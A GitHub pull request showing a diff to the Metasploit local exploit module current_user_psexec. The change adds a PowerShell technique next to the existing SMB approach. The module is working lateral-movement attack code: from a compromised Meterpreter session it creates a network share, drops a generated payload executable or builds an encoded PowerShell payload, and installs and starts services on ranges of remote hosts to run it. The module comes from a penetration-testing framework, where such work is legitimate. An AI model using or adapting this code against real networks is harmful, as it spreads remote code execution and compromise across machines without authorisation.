Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adds Powershell Technique to current_user_psexec #2404

Merged
merged 1 commit into from Sep 20, 2013
Merged

Adds Powershell Technique to current_user_psexec #2404

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
84 changes: 49 additions & 35 deletions modules/exploits/windows/local/current_user_psexec.rb
View file
Open in desktop
Expand Up @@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::Common
include Post::Windows::Services
include Exploit::EXE
include Exploit::Powershell
include Post::File

def initialize(info={})
Expand All @@ -44,6 +45,10 @@ def initialize(info={})
[ 'OSVDB', '3106'],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
Expand All @@ -59,43 +64,47 @@ def initialize(info={})
]),
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
])
end

def exploit
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)

# XXX Find the domain controller

#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"

# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"

# Create them
print_status("Creating share #{share_dir}")
session.fs.dir.mkdir(share_dir)
cmd_exec("net share #{share_name}=#{share_dir}")

# Generate an executable from the shellcode and drop it in the share
# directory
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)

print_status("Dropping payload #{filename}")
write_file("#{share_dir}\\#{filename}", payload_exe)

service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
if datastore['TECHNIQUE'] == 'SMB'
# XXX Find the domain controller

#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"

# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"

# Create them
print_status("Creating share #{share_dir}")
session.fs.dir.mkdir(share_dir)
cmd_exec("net share #{share_name}=#{share_dir}")

# Generate an executable from the shellcode and drop it in the share
# directory
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)

print_status("Dropping payload #{filename}")
write_file("#{share_dir}\\#{filename}", payload_exe)

service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
else
service_executable = cmd_psh_payload(payload.encoded)
end

begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
Expand All @@ -113,18 +122,23 @@ def exploit

print_status("#{server.ljust(16)} Deleting the service")
service_delete(name, server)
rescue
rescue Rex::TimeoutError
vprint_status("#{server.ljust(16)} Timed out...")
next
rescue RuntimeError
print_error("Exception running payload: #{$!.class} : #{$!}")
print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
next
end
end
ensure
print_status("Deleting share #{share_name}")
cmd_exec("net share #{share_name} /delete /y")
print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
if datastore['TECHNIQUE'] == 'SMB'
print_status("Deleting share #{share_name}")
cmd_exec("net share #{share_name} /delete /y")
print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
end
end

end
Expand Down